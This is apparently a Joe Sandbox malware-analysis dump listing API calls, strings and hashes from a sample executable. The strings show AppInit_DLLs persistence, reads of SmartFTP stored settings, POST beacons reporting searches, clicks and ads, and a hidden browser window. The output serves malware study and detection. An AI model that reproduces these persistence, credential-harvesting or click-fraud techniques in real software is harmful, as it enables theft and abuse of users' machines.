                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 876702719-0
                                                                                                                                                                                                                • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E4
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: +@
                                                                                                                                                                                                                • API String ID: 3341692771-3835504741
                                                                                                                                                                                                                • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                                • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                                                                                                                                                                                                                • API String ID: 3100629401-2436734164
                                                                                                                                                                                                                • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                                                                                                                                                                                                                • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                                                                                                                                                                                                                • String ID: none
                                                                                                                                                                                                                • API String ID: 2353737338-2140143823
                                                                                                                                                                                                                • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                                                                                                                                                                                                                • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                                • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 0040A26B
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A28E
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A296
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                                                                                                                                                                                                                • String ID: J(@
                                                                                                                                                                                                                • API String ID: 3143865713-2848800318
                                                                                                                                                                                                                • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                                • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407880
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00407888
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseCountCreateHandleModuleNameTickTime
                                                                                                                                                                                                                • String ID: UniqueNum
                                                                                                                                                                                                                • API String ID: 1853814767-3816303966
                                                                                                                                                                                                                • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                                                                                                                                                                                                                • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerRead
                                                                                                                                                                                                                • String ID: UniqueNum$d$hOAd$x
                                                                                                                                                                                                                • API String ID: 1528952607-1018652783
                                                                                                                                                                                                                • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                                                                                                                                                                                                                  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                                                                                                                                                                                                                • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                                                                                                                                                                                                                • API String ID: 4026185228-3265104503
                                                                                                                                                                                                                • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B00
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B0E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: </title>$</url>$<title>$<url>
                                                                                                                                                                                                                • API String ID: 2525500382-2286408829
                                                                                                                                                                                                                • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                                                                                                                                                                                                                • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040AAC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 0, xrefs: 0040AA5B
                                                                                                                                                                                                                • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                                • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                                                                                                                                                                                                                • API String ID: 3713053250-1268808612
                                                                                                                                                                                                                • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                                • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00408452
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1974014688-0
                                                                                                                                                                                                                • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                                • API String ID: 961146071-1814004025
                                                                                                                                                                                                                • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                                                                                                                                                                                                                • folder, xrefs: 00405184
                                                                                                                                                                                                                • personal favorites, xrefs: 00405176
                                                                                                                                                                                                                • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentExpandOpenStrings
                                                                                                                                                                                                                • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                                                                                                                                                                                                                • API String ID: 3923277744-821743658
                                                                                                                                                                                                                • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                                • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
